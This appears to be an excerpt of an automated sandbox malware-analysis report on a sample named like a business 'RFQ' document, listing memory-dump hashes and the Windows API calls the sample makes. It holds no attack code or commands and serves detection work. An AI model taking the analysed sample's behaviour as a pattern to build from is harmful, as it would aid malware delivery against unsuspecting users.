                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1895ac875862405ff427e9f2d97f30366b287d088fef157ca565c05f33fc53ed
                                                                                                            • Instruction ID: 3e174c94b2ed67cfc4b9d60306737727861c90ee465d38cf928daec782496730
                                                                                                            • Opcode Fuzzy Hash: 1895ac875862405ff427e9f2d97f30366b287d088fef157ca565c05f33fc53ed
                                                                                                            • Instruction Fuzzy Hash: 47C1AE74E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB355DB359E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd2bc7f74d924414bcde26e0441cba4996c414cbc7e2279bf33d18f9e68ee1c4
                                                                                                            • Instruction ID: 4063d3c34ef140a345275c55134f89c08782b9aaa08de831ddbf27b6bd4cff9a
                                                                                                            • Opcode Fuzzy Hash: bd2bc7f74d924414bcde26e0441cba4996c414cbc7e2279bf33d18f9e68ee1c4
                                                                                                            • Instruction Fuzzy Hash: A5C1A074E01218CFDB14DFA5C994B9DBBB2AF89301F2081A9D809BB365DB355E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6eed1472162eea13b53bc72bf5debd6927bf594895215950841391958941f02c
                                                                                                            • Instruction ID: 08f2778ace74bb608addfc2ba0008208b9e0511e8021f90e62745750514451a7
                                                                                                            • Opcode Fuzzy Hash: 6eed1472162eea13b53bc72bf5debd6927bf594895215950841391958941f02c
                                                                                                            • Instruction Fuzzy Hash: 0AC1B074E00218CFDB14DFA5C994B9DBBB2AF89301F2081A9D908BB355DB355E86CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 704c80dff6dac958ab8030129b2647de86b52b91f4a95d53ef726e1febdfb088
                                                                                                            • Instruction ID: 86ef5aa1c9d5673116ec39e0ea75d5d5f7dc4d3c7924f6841efc7ff83b86acd7
                                                                                                            • Opcode Fuzzy Hash: 704c80dff6dac958ab8030129b2647de86b52b91f4a95d53ef726e1febdfb088
                                                                                                            • Instruction Fuzzy Hash: 95C1B174E01218CFDB14DFA5C994B9DBBB2AF89301F2080A9D908BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f6dd46ad1e061e62a881d1f505603c2328b5b0a6898fdbad8c74cc342f37ff69
                                                                                                            • Instruction ID: e02ecee2c5dc4f46df66bee0e4b041f3b7427440ed7b7a55848267d84d069813
                                                                                                            • Opcode Fuzzy Hash: f6dd46ad1e061e62a881d1f505603c2328b5b0a6898fdbad8c74cc342f37ff69
                                                                                                            • Instruction Fuzzy Hash: 99C1BD74E00218CFDB14DFA5C994B9DBBB2AF89301F2081A9D909BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f42412cec165c8d75b265fed557f125dacb1863e96d70853a7c05027efed42b
                                                                                                            • Instruction ID: cb57704044e2a5145dde02787284d964c6e3f9a73d665db365e7bb8272b29d89
                                                                                                            • Opcode Fuzzy Hash: 6f42412cec165c8d75b265fed557f125dacb1863e96d70853a7c05027efed42b
                                                                                                            • Instruction Fuzzy Hash: D0C1BF74E00218CFDB14DFA5C994B9DBBB2AF89300F2081A9D909BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cfa32425e3dafca9bc2e55140fbbc270593d4b9c399ced213e17b95ae32c4032
                                                                                                            • Instruction ID: 87ffc266802e0060d4d68297e6069a40109629383184c7da20368c688c8229c2
                                                                                                            • Opcode Fuzzy Hash: cfa32425e3dafca9bc2e55140fbbc270593d4b9c399ced213e17b95ae32c4032
                                                                                                            • Instruction Fuzzy Hash: 3FC1AD74E01218CFDB14DFA5C994B9DBBB2AF89301F6080A9D909BB354DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9df3a3f491631a44865fd5ac81af2e3fb146823c03f04da36682b951675627dd
                                                                                                            • Instruction ID: c9e94e1c0e9188f1e207b0ae33282a28787f4d8ce969a6a4f8cf23f8b9c5a9da
                                                                                                            • Opcode Fuzzy Hash: 9df3a3f491631a44865fd5ac81af2e3fb146823c03f04da36682b951675627dd
                                                                                                            • Instruction Fuzzy Hash: 91C1BD74E01218CFDB14DFA5C994B9DBBB2AF89301F2080A9D909BB355DB359E82CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35465bf2eb353828d8f40f27e01c532e8ec96f4909c540638c1d04d0ade290b4
                                                                                                            • Instruction ID: 11cdb33ac31241e278bc07eea279165fe0b578b942a911288916b72d045de995
                                                                                                            • Opcode Fuzzy Hash: 35465bf2eb353828d8f40f27e01c532e8ec96f4909c540638c1d04d0ade290b4
                                                                                                            • Instruction Fuzzy Hash: 67C1AD74E01218CFDB14DFA5C994B9DBBB2AF89301F2080A9D908BB355DB359E86CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5881b56ff6f7bb0eee0530ed068c6902ddfa1722224c796414590a78688c6c3e
                                                                                                            • Instruction ID: 19dda551020affb43ae801e9db3a6b28d31596efa5297a0471d25ba85af26628
                                                                                                            • Opcode Fuzzy Hash: 5881b56ff6f7bb0eee0530ed068c6902ddfa1722224c796414590a78688c6c3e
                                                                                                            • Instruction Fuzzy Hash: 48A18D74A01228CFDB65DF24C894B99BBB2FF4A305F1085EAD54DA7250DB319E81CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db5d7c645956ae5cc20a65f77167d11516f0acb68fff8fb4530da7341aedf387
                                                                                                            • Instruction ID: 86dc6b2836dcf1f2afc001d744ac5f17582bec922a7746fe735739c1f331644c
                                                                                                            • Opcode Fuzzy Hash: db5d7c645956ae5cc20a65f77167d11516f0acb68fff8fb4530da7341aedf387
                                                                                                            • Instruction Fuzzy Hash: 98519F74A01329CFDB65DF24C894B99BBB2FB4A305F5085E9D449B7250DB319E82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f301aaa9f07638b32c6479c30e870aa96c7bbe9e60f39734ee5f641d5ecbb78d
                                                                                                            • Instruction ID: c94401cf2136f28e8efa1277c61592767ad658e4a6c7f6b0efda296acbeb6103
                                                                                                            • Opcode Fuzzy Hash: f301aaa9f07638b32c6479c30e870aa96c7bbe9e60f39734ee5f641d5ecbb78d
                                                                                                            • Instruction Fuzzy Hash: 02D09E75E4422C8ACB11DFA8E8402ECF7B4EB99311F0264A6C68DA7200DB715A908F56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d9ed9b865c0d729298ca640fa9376bdb0b0beb3cdb4dbbaa08a58c911e13a60
                                                                                                            • Instruction ID: 342b18c34d5206bd6e2173cb0a3185152ceac8655bcf8bdbad58300ccf443838
                                                                                                            • Opcode Fuzzy Hash: 4d9ed9b865c0d729298ca640fa9376bdb0b0beb3cdb4dbbaa08a58c911e13a60
                                                                                                            • Instruction Fuzzy Hash: 9CD09E74D4422CCACB21DF64DD402ECFB70FB9A300F022495C58CA7200D7719E948E56
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                              • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                            • CreatePopupMenu.USER32 ref: 00405580
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                            • EmptyClipboard.USER32 ref: 0040561B
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                            • CloseClipboard.USER32 ref: 00405676
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                            • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                            • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                            • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                            • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                            • DestroyWindow.USER32 ref: 00403CAE
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 184305955-0
                                                                                                            • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                            • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                            • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                            • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                            • GetSysColor.USER32(?), ref: 00404396
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                            • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                            • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                            • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                            • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: -B@$N$open
                                                                                                            • API String ID: 3615053054-1057335957
                                                                                                            • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                            • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                            • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                            • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                            • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                              • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1115850852
                                                                                                            • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                            • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                            • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                            • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                            • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                            • wsprintfA.USER32 ref: 00405DFB
